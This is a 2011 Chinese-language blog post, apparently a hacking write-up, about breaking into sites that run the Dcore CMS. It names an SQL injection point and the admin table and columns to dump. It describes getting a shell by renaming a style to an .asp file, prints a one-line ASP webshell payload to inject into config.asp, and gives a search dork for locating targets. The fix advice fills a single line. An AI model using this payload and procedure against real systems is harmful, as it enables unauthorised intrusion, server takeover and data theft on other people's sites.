Dcore(轻型CMS系统)后台拿SHELL方法及修补方法

2011, May 1, 8:32 PM. 漏洞分析
Submitted by admin
作者:Mr.DzY
增加了风格与站点表的关联;
后台:admin/login.asp 如不存在,自行猜解。
 
注入点:http://www.xxxx.net/index.asp?subsite=1
在工具里增加表名:dcore_user 列名:user_admin user_password
如果不怕麻烦也可以手工猜解。
 
 
拿shell方法:
后台--->风格管理--->选任意风格修改成Mr.DzY.asp--->编辑皮肤。
 
测试关键字:inurl:dynamic.asp?/1-2-17.html
多的自己构造。还是那老话,法律不允许,请勿非法入侵他人站点及破坏他人数据。
本文只作技术交流。对其引起的后果,自行承担。本人概不负责。
 
修补方法:加强密码强度/过滤非法字符/修改默认路径
 
通过这个0DAY很方便拿下SHELL。感谢先人的奉献呵呵
 
再看程序过程中发现根目录文件config.asp,是网站配置,也就是说后台直接修改网站配置信息写入一句话就能连接之,和南方数据企业网站管理系统后台一样
 
 
 
直接在信息版本后加上"%><%eval request("#")%><%' 加好后,是不显示这些代码的,还是原来的样子,但其实已经可以了
 
 
 
后面直接一句话连接之http://wwww.xxxx.net/config.asp
Tags: dcore

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):